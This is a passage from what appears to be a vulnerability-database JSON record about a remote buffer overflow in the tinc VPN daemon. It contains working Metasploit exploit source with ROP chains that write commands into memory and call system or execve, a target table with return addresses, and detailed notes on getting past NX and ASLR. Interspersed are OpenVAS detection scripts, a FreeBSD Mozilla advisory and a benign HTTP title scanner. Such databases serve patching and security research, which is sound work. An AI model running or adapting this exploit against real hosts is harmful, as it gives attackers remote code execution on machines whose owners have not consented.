section\r\n\r\n # Put the first location to write to in r4\r\n rop += pop_r4_ret\r\n\r\n sys_execv_args.scan(/.{1,4}/).each_with_index do |argument_part, i|\r\n # Give location inside .data via stack\r\n rop += [loc_dot_data + i * 4].pack('V')\r\n # Pop 4 bytes of the command into r3\r\n rop += pop_r3_ret\r\n # Give 4 bytes of command on stack\r\n if argument_part.length == 4\r\n rop += argument_part\r\n else\r\n rop += argument_part + rand_text_alpha(4 - argument_part.length)\r\n end\r\n # Write the 4 bytes to the writable location\r\n rop += mov_to_r4_addr_pop_r4_ret\r\n end\r\n\r\n # put the address of the payload into r4\r\n rop += [loc_dot_data].pack('V')\r\n\r\n # now move r4 to r0\r\n rop += mov_r0_r4_pop_r4_ret\r\n rop += rand_text_alpha(4)\r\n # we don't care what ends up in r4 now\r\n\r\n # call system\r\n rop += system_addr\r\n end\r\n\r\n def create_fedora_rop(sys_execv_args)\r\n # Gadgets tincd\r\n loc_dot_data = 0x80692e0 # a location inside .data\r\n pop_eax = [0x8065969].pack('V') # pop eax; ret\r\n pop_ebx = [0x8049d8d].pack('V') # pop ebx; ret\r\n pop_ecx = [0x804e113].pack('V') # pop ecx; ret\r\n xor_eax_eax = [0x804cd60].pack('V') # xor eax eax; ret\r\n # <ATTENTION> This one destroys ebx:\r\n mov_to_eax_addr = [0x805f2c2].pack('V') + rand_text_alpha(4) # mov [eax] ecx ; pop ebx ; ret\r\n # </ATTENTION>\r\n\r\n # Gadgets libcrypto.so.10 libcrypto.so.1.0.1e\r\n xchg_ecx_eax = [0x4d170d1f].pack('V') # xchg ecx,eax; ret\r\n # xchg_edx_eax = [0x4d25afa3].pack('V') # xchg edx,eax ; ret\r\n # inc_eax = [0x4d119ebc].pack('V') # inc eax ; ret\r\n\r\n # Gadgets libc.so.6 libc-2.17.so\r\n pop_edx = [0x4b5d7aaa].pack('V') # pop edx; ret\r\n int_80 = [0x4b6049c5].pack('V') # int 0x80\r\n\r\n # Linux kernel system call 11: sys_execve\r\n # ROP\r\n rop = ''\r\n\r\n index = 0\r\n stored_argument_pointer_offsets = []\r\n\r\n sys_execv_args.each_with_index do |argument, argument_no|\r\n stored_argument_pointer_offsets << index\r\n argument.scan(/.{1,4}/).each_with_index do |argument_part, i|\r\n # Put location to write to in eax\r\n rop += pop_eax\r\n # Give location inside .data via stack\r\n rop += [loc_dot_data + index + i * 4].pack('V')\r\n # Pop 4 bytes of the command into ecx\r\n rop += pop_ecx\r\n # Give 4 bytes of command on stack\r\n if argument_part.length == 4\r\n rop += argument_part\r\n else\r\n rop += argument_part + rand_text_alpha(4 - argument_part.length)\r\n end\r\n # Write the 4 bytes to the writable location\r\n rop += mov_to_eax_addr\r\n end\r\n # We have to end the argument with a zero byte\r\n index += argument.length\r\n # We don't have \"xor ecx, ecx\", but we have it for eax...\r\n rop += xor_eax_eax\r\n rop += xchg_ecx_eax\r\n # Put location to write to in eax\r\n rop += pop_eax\r\n # Give location inside .data via stack\r\n rop += [loc_dot_data + index].pack('V')\r\n # Write the zeros\r\n rop += mov_to_eax_addr\r\n index += 1 # where we can write the next argument\r\n end\r\n\r\n # Append address of the start of each argument\r\n stored_argument_pointer_offsets.each do |offset|\r\n rop += pop_eax\r\n rop += [loc_dot_data + index].pack('V')\r\n rop += pop_ecx\r\n rop += [loc_dot_data + offset].pack('V')\r\n rop += mov_to_eax_addr\r\n index += 4\r\n end\r\n # end with zero\r\n rop += xor_eax_eax\r\n rop += xchg_ecx_eax\r\n\r\n rop += pop_eax\r\n rop += [loc_dot_data + index].pack('V')\r\n rop += mov_to_eax_addr\r\n\r\n rop += pop_ebx\r\n rop += [loc_dot_data].pack('V')\r\n\r\n rop += pop_ecx\r\n rop += [loc_dot_data + sys_execv_args.join(' ').length + 1].pack('V')\r\n\r\n rop += pop_edx\r\n rop += [loc_dot_data + index].pack('V')\r\n\r\n # sys call 11 = sys_execve\r\n rop += pop_eax\r\n rop += [0x0000000b].pack('V')\r\n\r\n rop += int_80\r\n end\r\nend", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/35441/"}], "openvas": [{"lastseen": "2018-10-22T16:38:11", "bulletinFamily": "scanner", "description": "This host is installed with Mozilla\n Firefox ESR and is prone to multiple vulnerabilities.", "modified": "2018-10-12T00:00:00", "published": "2015-08-19T00:00:00", "id": "OPENVAS:1361412562310806022", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310806022", "title": "Mozilla Firefox ESR Multiple Vulnerabilities - Aug15 (Windows)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_mozilla_firefox_esr_mult_vuln01_aug15_win.nasl 11872 2018-10-12 11:22:41Z cfischer $\n#\n# Mozilla Firefox ESR Multiple Vulnerabilities - Aug15 (Windows)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:mozilla:firefox_esr\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.806022\");\n script_version(\"$Revision: 11872 $\");\n script_cve_id(\"CVE-2015-4473\", \"CVE-2015-4475\", \"CVE-2015-4478\", \"CVE-2015-4479\",\n \"CVE-2015-4480\", \"CVE-2015-4481\", \"CVE-2015-4482\", \"CVE-2015-4484\",\n \"CVE-2015-4485\", \"CVE-2015-4486\", \"CVE-2015-4487\", \"CVE-2015-4488\",\n \"CVE-2015-4489\", \"CVE-2015-4492\", \"CVE-2015-4493\");\n script_bugtraq_id(76294, 76297);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 13:22:41 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-08-19 10:17:42 +0530 (Wed, 19 Aug 2015)\");\n script_name(\"Mozilla Firefox ESR Multiple Vulnerabilities - Aug15 (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Mozilla\n Firefox ESR and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - The 'mozilla::AudioSink' function in Mozilla Firefox mishandles inconsistent\n sample formats within MP3 audio data.\n\n - Not imposing certain ECMAScript 6 requirements on JavaScript object\n properties.\n\n - Multiple integer overflows in libstagefright.\n\n - Race condition in the Mozilla Maintenance Service.\n\n - Vulnerability in 'mar_read.c' script in the Updater.\n\n - Vulnerability in 'js::jit::AssemblerX86Shared::lock_addl' function in the\n JavaScript implementation.\n\n - Heap-based buffer overflow in the 'resize_context_buffers' function in\n libvpx.\n\n - Vulnerability in decrease_ref_count function in libvpx.\n\n - Overflow vulnerability in 'nsTSubstring::ReplacePrep' function.\n\n - Use-after-free vulnerability in the 'StyleAnimationValue' class.\n\n - Vulnerability in 'nsTArray_Impl' class in Mozilla Firefox.\n\n - Use-after-free vulnerability in the 'XMLHttpRequest::Open' implementation.\n\n - Heap-based buffer overflow in the 'stagefright::ESDS::parseESDescriptor'\n function in libstagefright.\n\n - Multiple unspecified vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow local\n and remote attackers to cause a denial of service or possibly execute arbitrary\n code, gain privileges and some unspecified impacts.\");\n\n script_tag(name:\"affected\", value:\"Mozilla Firefox ESR version 38.x before\n 38.2 on Windows\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Mozilla Firefox ESR version\n 38.2 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-90/\");\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-83/\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_firefox_detect_portable_win.nasl\");\n script_mandatory_keys(\"Firefox-ESR/Win/Ver\");\n script_xref(name:\"URL\", value:\"http://www.mozilla.com/en-US/firefox/all.html\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!ffVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(ffVer =~ \"^38\\.\")\n{\n if(version_is_less(version:ffVer, test_version:\"38.2\"))\n {\n report = 'Installed version: ' + ffVer + '\\n' +\n 'Fixed version: ' + \"38.2\" + '\\n';\n security_message(data:report);\n exit(0);\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-03-18T14:38:21", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2014-05-05T00:00:00", "id": "OPENVAS:1361412562310867754", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310867754", "title": "Fedora Update for zabbix FEDORA-2014-5540", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for zabbix FEDORA-2014-5540\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.867754\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-05-05 11:13:19 +0530 (Mon, 05 May 2014)\");\n script_cve_id(\"CVE-2014-1682\", \"CVE-2013-5572\", \"CVE-2014-1685\", \"CVE-2013-6824\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for zabbix FEDORA-2014-5540\");\n script_tag(name:\"affected\", value:\"zabbix on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-5540\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-May/132377.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'zabbix'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"zabbix\", rpm:\"zabbix~2.0.11~3.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "freebsd": [{"lastseen": "2018-08-31T01:14:35", "bulletinFamily": "unix", "description": "\nThe Mozilla Project reports:\n\nMFSA 2015-79 Miscellaneous memory safety hazards (rv:40.0\n\t / rv:38.2)\nMFSA 2015-80 Out-of-bounds read with malformed MP3\n\t file\nMFSA 2015-81 Use-after-free in MediaStream playback\nMFSA 2015-82 Redefinition of non-configurable JavaScript object properties\nMFSA 2015-83 Overflow issues in libstagefright\nMFSA 2015-84 Arbitrary file overwriting through Mozilla\n\t Maintenance Service with hard links\nMFSA 2015-85 Out-of-bounds write with Updater and\n\t malicious MAR file\nMFSA 2015-86 Feed protocol with POST bypasses mixed\n\t content protections\nMFSA 2015-87 Crash when using shared memory in\n\t JavaScript\nMFSA 2015-88 Heap overflow in gdk-pixbuf when scaling\n\t bitmap images\nMFSA 2015-90 Vulnerabilities found through code\n\t inspection\nMFSA 2015-91 Mozilla Content Security Policy allows for\n\t asterisk wildcards in violation of CSP specification\nMFSA 2015-92 Use-after-free in XMLHttpRequest with shared\n\t workers\n\n", "modified": "2015-08-22T00:00:00", "published": "2015-08-11T00:00:00", "id": "C66A5632-708A-4727-8236-D65B2D5B2739", "href": "https://vuxml.freebsd.org/freebsd/c66a5632-708a-4727-8236-d65b2d5b2739.html", "title": "mozilla -- multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2019-04-28T11:05:22", "bulletinFamily": "exploit", "description": "Generates a GET request to the provided webservers and returns the server header, HTML title attribute and location header (if set). This is useful for rapidly identifying interesting web applications en mass.", "modified": "2019-02-16T20:42:12", "published": "2015-05-11T16:29:22", "id": "MSF:AUXILIARY/SCANNER/HTTP/TITLE", "href": "", "type": "metasploit", "title": "HTTP HTML Title Tag Content Grabber", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n # Exploit mixins should be called first\n include Msf::Exploit::Remote::HttpClient\n # Scanner mixin should be near last\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'HTTP HTML Title Tag Content Grabber',\n 'Description' => %q{\n Generates a GET request to the provided webservers and returns the server header,\n HTML title attribute and location header (if set). This is useful for rapidly identifying\n interesting web applications en mass.\n },\n 'Author' => 'Stuart Morgan <stuart.morgan[at]mwrinfosecurity.com>',\n 'License' => MSF_LICENSE,\n )\n\n register_options(\n [\n OptBool.new('STORE_NOTES', [ true, 'Store the captured information in notes. Use \"notes -t http.title\" to view', true ]),\n OptBool.new('SHOW_TITLES', [ true, 'Show the titles on the console as they are grabbed', true ]),\n OptString.new('TARGETURI', [true, 'The base path', '/'])\n ])\n\n deregister_options('VHOST')\n end\n\n def run\n if !datastore['STORE_NOTES'] && !datastore['SHOW_TITLES']\n print_error(\"Notes storage is false and titles are not being shown on the console. There isn't much point in running this module.\")\n else\n super\n end\n end\n\n def run_host(target_host)\n begin\n # Send a normal GET request\n res = send_request_cgi(\n 'uri' => normalize_uri(target_uri.path)\n )\n\n # If no response, quit now\n if res.nil?\n vprint_error(\"[#{target_host}:#{rport}] No response\")\n return\n end\n\n # Retrieve the headers to capture the Location and Server header\n # Note that they are case-insensitive but stored in a hash\n server_header = nil\n location_header = nil\n if !res.headers.nil?\n res.headers.each do |key, val|\n location_header = val if key.downcase == 'location'\n server_header = val if key.downcase == 'server'\n end\n else\n vprint_error(\"[#{target_host}:#{rport}] No HTTP headers\")\n end\n\n # If the body is blank, just stop now as there is no chance of a title\n if res.body.nil?\n vprint_error(\"[#{target_host}:#{rport}] No webpage body\")\n return\n end\n\n # Very basic, just match the first title tag we come to. If the match fails,\n # there is no chance that we will have a title\n rx = %r{<title>[\\n\\t\\s]*(?<title>.+?)[\\s\\n\\t]*</title>}im.match(res.body.to_s)\n unless rx\n vprint_error(\"[#{target_host}:#{rport}] No webpage title\")\n return\n end\n\n # Last bit of logic to capture the title\n rx[:title].strip!\n if rx[:title] != ''\n rx_title = Rex::Text.html_decode(rx[:title])\n if datastore['SHOW_TITLES']\n print_good(\"[#{target_host}:#{rport}] [C:#{res.code}] [R:#{location_header}] [S:#{server_header}] #{rx_title}\")\n end\n if datastore['STORE_NOTES']\n notedata = { code: res.code, port: rport, server: server_header, title: rx_title, redirect: location_header, uri: datastore['TARGETURI'] }\n report_note(host: target_host, port: rport, type: \"http.title\", data: notedata, update: :unique_data)\n end\n else\n vprint_error(\"[#{target_host}:#{rport}] No webpage title\")\n end\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout\n rescue ::Timeout::Error, ::Errno::EPIPE\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/http/title.rb"}], "packetstorm": [{"lastseen": "2016-12-05T22:19:50", "bulletinFamily": "exploit", "description": "", "modified": "2014-12-01T00:00:00", "published": "2014-12-01T00:00:00", "href": "https://packetstormsecurity.com/files/129343/Tincd-Post-Authentication-Remote-TCP-Stack-Buffer-Overflow.html", "id": "PACKETSTORM:129343", "type": "packetstorm", "title": "Tincd Post-Authentication Remote TCP Stack Buffer Overflow", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \nrequire 'securerandom' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = AverageRanking \n \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::Remote::TincdExploitClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Tincd Post-Authentication Remote TCP Stack Buffer Overflow', \n'Description' => %q{ \nThis module exploits a stack buffer overflow in Tinc's tincd \nservice. After authentication, a specially crafted tcp packet (default port 655) \nleads to a buffer overflow and allows to execute arbitrary code. This module has \nbeen tested with tinc-1.1pre6 on Windows XP (custom calc payload) and Windows 7 \n(windows/meterpreter/reverse_tcp), and tinc version 1.0.19 from the ports of \nFreeBSD 9.1-RELEASE # 0 and various other OS, see targets. The exploit probably works \nfor all versions <= 1.1pre6. \nA manually compiled version (1.1.pre6) on Ubuntu 12.10 with gcc 4.7.2 seems to \nbe a non-exploitable crash due to calls to __memcpy_chk depending on how tincd \nwas compiled. Bug got fixed in version 1.0.21/1.1pre7. While writing this module \nit was recommended to the maintainer to start using DEP/ASLR and other protection \nmechanisms. \n}, \n'Author' => \n[ \n# PoC changes (mostly reliability), port python to ruby, exploitation including ROP, support for all OS, metasploit module \n'Tobias Ospelt <tobias[at]modzero.ch>', # @floyd_ch \n# original finding, python PoC crash \n'Martin Schobert <schobert[at]modzero.ch>' # @nitram2342 \n], \n'References' => \n[ \n['CVE', '2013-1428'], \n['OSVDB', '92653'], \n['BID', '59369'], \n['URL', 'http://www.floyd.ch/?p=741'], \n['URL', 'http://sitsec.net/blog/2013/04/22/stack-based-buffer-overflow-in-the-vpn-software-tinc-for-authenticated-peers/'], \n['URL', 'http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2013-1428'] \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process' \n}, \n'Payload' => \n{ \n'Space' => 1675, \n'DisableNops' => true \n}, \n'Privileged' => true, \n'Targets' => \n[ \n# full exploitation x86: \n['Windows XP x86, tinc 1.1.pre6 (exe installer)', { 'Platform' => 'win', 'Ret' => 0x0041CAA6, 'offset' => 1676 }], \n['Windows 7 x86, tinc 1.1.pre6 (exe installer)', { 'Platform' => 'win', 'Ret' => 0x0041CAA6, 'offset' => 1676 }], \n['FreeBSD 9.1-RELEASE # 0 x86, tinc 1.0.19 (ports)', { 'Platform' => 'bsd', 'Ret' => 0x0804BABB, 'offset' => 1676 }], \n['Fedora 19 x86 ROP (NX), write binary to disk payloads, tinc 1.0.20 (manual compile)', { \n'Platform' => 'linux', 'Arch' => ARCH_X86, 'Ret' => 0x4d10ee87, 'offset' => 1676 } \n], \n['Fedora 19 x86 ROP (NX), CMD exec payload, tinc 1.0.20 (manual compile)', { \n'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Ret' => 0x4d10ee87, 'offset' => 1676 } \n], \n['Archlinux 2013.04.01 x86, tinc 1.0.20 (manual compile)', { 'Platform' => 'linux', 'Ret' => 0x08065929, 'offset' => 1676 }], \n['OpenSuse 11.2 x86, tinc 1.0.20 (manual compile)', { 'Platform' => 'linux', 'Ret' => 0x0804b07f, 'offset' => 1676 }], \n# full exploitation ARM: \n['Pidora 18 ARM ROP(NX)/ASLR brute force, write binary to disk payloads, tinc 1.0.20 (manual compile with restarting daemon)', { \n'Platform' => 'linux', 'Arch' => ARCH_ARMLE, 'Ret' => 0x00015cb4, 'offset' => 1668 } \n], \n['Pidora 18 ARM ROP(NX)/ASLR brute force, CMD exec payload, tinc 1.0.20 (manual compile with restarting daemon)', { \n'Platform' => 'linux', 'Arch' => ARCH_CMD, 'Ret' => 0x00015cb4, 'offset' => 1668 } \n], \n# crash only: \n['Crash only: Ubuntu 12.10 x86, tinc 1.1.pre6 (apt-get or manual compile)', { 'Platform' => 'linux', 'Ret' => 0x0041CAA6, 'offset' => 1676 }], \n['Crash only: Fedora 16 x86, tinc 1.0.19 (yum)', { 'Platform' => 'linux', 'Ret' => 0x0041CAA6, 'offset' => 1676 }], \n['Crash only: OpenSuse 11.2 x86, tinc 1.0.16 (rpm package)', { 'Platform' => 'linux', 'Ret' => 0x0041CAA6, 'offset' => 1676 }], \n['Crash only: Debian 7.3 ARM, tinc 1.0.19 (apt-get)', { 'Platform' => 'linux', 'Ret' => 0x9000, 'offset' => 1668 }] \n], \n'DisclosureDate' => 'Apr 22 2013', # finding, msf module: Dec 2013 \n'DefaultTarget' => 0)) \n \nregister_options( \n[ # Only for shellcodes that write binary to disk \n# Has to be short, usually either . or /tmp works \n# /tmp could be mounted as noexec \n# . is usually only working if tincd is running as root \nOptString.new('BINARY_DROP_LOCATION', [false, 'Short location to drop executable on server, usually /tmp or .', '/tmp']), \nOptInt.new('BRUTEFORCE_TRIES', [false, 'How many brute force tries (ASLR brute force)', 200]), \nOptInt.new('WAIT', [false, 'Waiting time for server daemon restart (ASLR brute force)', 3]) \n], self \n) \nend \n \ndef exploit \n# # \n# x86 \n# # \n# WINDOWS XP and 7 full exploitation \n# Simple, we only need some mona.py magic \n# C:\\Program Files\\tinc>\"C:\\Program Files\\Immunity Inc\\Immunity Debugger\\ImmunityDebugger.exe\" \"C:\\Program Files\\tinc\\tincd.exe -D -d 5\" \n# !mona config -set workingfolder c:\\logs\\%p \n# !mona pc 1682 \n# --> C:\\logs\\tincd\\pattern \n# !mona findmsp \n# Straight forward, when we overwrite EIP the second value \n# on the stack is pointing to our payload. \n# !mona findwild -o -type instr -s \"pop r32# ret\" \n \n# FREEBSD full exploitation \n# Same offset as windows, same exploitation method \n# But we needed a new pop r32# ret for the freebsd version \n# No mona.py help on bsd or linux so: \n# - Dumped .text part of tincd binary in gdb \n# - Search in hex editor for opcodes for \"pop r32# ret\": \n# 58c3, 59c3, ..., 5fc3 \n# - Found a couple of 5dc3. ret = start of .text + offset in hex editor \n# - 0x0804BABB works very well \n \n# UBUNTU crash only \n# Manually compiled version (1.1.pre6) on Ubuntu 12.10 with gcc 4.7.2 seems to be a non-exploitable crash, because \n# the bug is in a fixed size (MAXSIZE) struct member variable. The size of the destination is known \n# at compile time. gcc is introducing a call to __memcpy_chk: \n# http://gcc.gnu.org/svn/gcc/branches/cilkplus/libssp/memcpy-chk.c \n# memcpy_chk does a __chk_fail call if the destination buffer is smaller than the source buffer. Therefore it will print \n# *** buffer overflow detected *** and terminate (SIGABRT). The same result for tincd 10.0.19 which can be installed \n# from the repository. It might be exploitable for versions compiled with an older version of gcc. \n# memcpy_chk seems to be in gcc since 2005: \n# http://gcc.gnu.org/svn/gcc/branches/cilkplus/libssp/memcpy-chk.c \n# http://gcc.gnu.org/git/?p=gcc.git;a=history;f=libssp/memcpy-chk.c;hb=92920cc62318e5e8b6d02d506eaf66c160796088 \n \n# OPENSUSE \n# OpenSuse 11.2 \n# Installation as described on the tincd website. For 11.2 there are two versions. \n# Decided for 1.0.16 as this is a vulnerable version \n# wget \"http://download.opensuse.org/repositories/home:/seilerphilipp/SLE_11_SP2/i586/tinc-1.0.16-3.1.i586.rpm\" \n# rpm -i tinc-1.0.16-3.1.i586.rpm \n# Again, strace shows us that the buffer overflow was detected (see Ubuntu) \n# writev(2, [{\"*** \", 4}, {\"buffer overflow detected\", 24}, {\" ***: \", 6}, {\"tincd\", 5}, {\" terminated\\n\", 12}], 5) = 51 \n# So a crash-only non-exploitable bof here. So let's go for manual install: \n# wget 'http://www.tinc-vpn.org/packages/tinc-1.0.20.tar.gz' \n# yast -i gcc zlib zlib-devel && echo \"yast is still ugly\" && zypper install lzo-devel libopenssl-devel make && make && make install \n# Exploitable. Let's see: \n# tincd is mapped at 0x8048000. There is a 5d3c at offset 307f in the tincd binary. this means: \n# the offset to pop ebp; ret is 0x0804b07f \n \n# FEDORA \n# Fedora 16 \n# yum has version 1.0.19 \n# yum install tinc \n# Non-exploitable crash, see Ubuntu. Strace tells us: \n# writev(2, [{\"*** \", 4}, {\"buffer overflow detected\", 24}, {\" ***: \", 6}, {\"tincd\", 5}, {\" terminated\\n\", 12}], 5) = 51 \n# About yum: Fedora 17 has fixed version 1.0.21, Fedora 19 fixed version 1.0.23 \n# Manual compile went on with Fedora 19 \n# wget 'http://www.tinc-vpn.org/packages/tinc-1.0.20.tar.gz' \n# yum install gcc zlib-devel.i686 lzo-devel.i686 openssl-devel.i686 && ./configure && make && make install \n# Don't forget to stop firewalld for testing, as the port is still closed otherwise \n# # hardening-check tincd \n# tincd: \n# Position Independent Executable: no, normal executable! \n# Stack protected: no, not found! \n# Fortify Source functions: no, only unprotected functions found! \n# Read-only relocations: yes \n# Immediate binding: no, not found! \n# Running this module with target set to Windows: \n# Program received signal SIGSEGV, Segmentation fault. \n# 0x0041caa6 in ?? () \n# well and that's our windows offset... \n# (gdb) info proc mappings \n# 0x8048000 0x8068000 0x20000 0x0 /usr/local/sbin/tincd \n# After finding a normal 5DC3 (pop ebp# ret) at offset 69c3 of the binary we \n# can try to execute the payload on the stack, but: \n# (gdb) stepi \n# Program received signal SIGSEGV, Segmentation fault. \n# 0x08e8ee08 in ?? () \n# Digging deeper we find: \n# dmesg | grep protection \n# [ 0.000000] NX (Execute Disable) protection: active \n# or: \n# # objdump -x /usr/local/sbin/tincd \n# [...] STACK off 0x00000000 vaddr 0x00000000 paddr 0x00000000 align 2**4 \n# filesz 0x00000000 memsz 0x00000000 flags rw- \n# or: https://bugzilla.redhat.com/show_bug.cgi?id=996365 \n# Time for ROP \n# To start the ROP we need a POP r32# POP ESP# RET (using the first four bytes of the shellcode \n# as a pointer to instructions). Was lucky after some searching: \n# (gdb) x/10i 0x4d10ee87 \n# 0x4d10ee87: pop %ebx \n# 0x4d10ee88: mov $0xf5d299dd,%eax \n# 0x4d10ee8d: rcr %cl,%al \n# 0x4d10ee8f: pop %esp \n# 0x4d10ee90: ret \n \n# ARCHLINUX \n# archlinux-2013.04.01 pacman has fixed version 1.0.23, so went for manual compile: \n# wget 'http://www.tinc-vpn.org/packages/tinc-1.0.20.tar.gz' \n# pacman -S gcc zlib lzo openssl make && ./configure && make && make install \n# Offset in binary to 58c3: 0x1D929 + tincd is mapped at starting address 0x8048000 \n# -->Ret: 0x8065929 \n# No NX protection, it simply runs the shellcode :) \n \n# # \n# ARM \n# # \n# ARM Pidora 18 (Raspberry Pi Fedora Remix) on a physical Raspberry Pi \n# Although this is more for the interested reader, as Pidora development \n# already stopped... Raspberry Pi's are ARM1176JZF-S (700 MHz) CPUs \n# meaning it's an ARMv6 architecture \n# yum has fixed version 1.0.21, so went for manual compile: \n# wget 'http://www.tinc-vpn.org/packages/tinc-1.0.20.tar.gz' \n# yum install gdb gcc zlib-devel lzo-devel openssl-devel && ./configure && make && make install \n# Is the binary protected? \n# wget \"http://www.trapkit.de/tools/checksec.sh\" && chmod +x checksec.sh \n# # ./checksec.sh --file /usr/local/sbin/tincd \n# RELRO STACK CANARY NX PIE RPATH RUNPATH FILE \n# No RELRO No canary found NX enabled No PIE No RPATH No RUNPATH /usr/local/sbin/tincd \n# so again NX... but what about the system things? \n# cat /proc/sys/kernel/randomize_va_space \n# 2 \n# --> \"Randomize the positions of the stack, VDSO page, shared memory regions, and the data segment. \n# This is the default setting.\" \n# Here some examples of the address of the system function: \n# 0xb6c40848 \n# 0xb6cdd848 \n# 0xb6c7c848 \n# Looks like we would have to brute force one byte \n# (gdb) info proc mappings \n# 0x8000 0x23000 0x1b000 0 /usr/local/sbin/tincd \n# 0x2b000 0x2c000 0x1000 0x1b000 /usr/local/sbin/tincd \n# When we exploit we get the following: \n# Program received 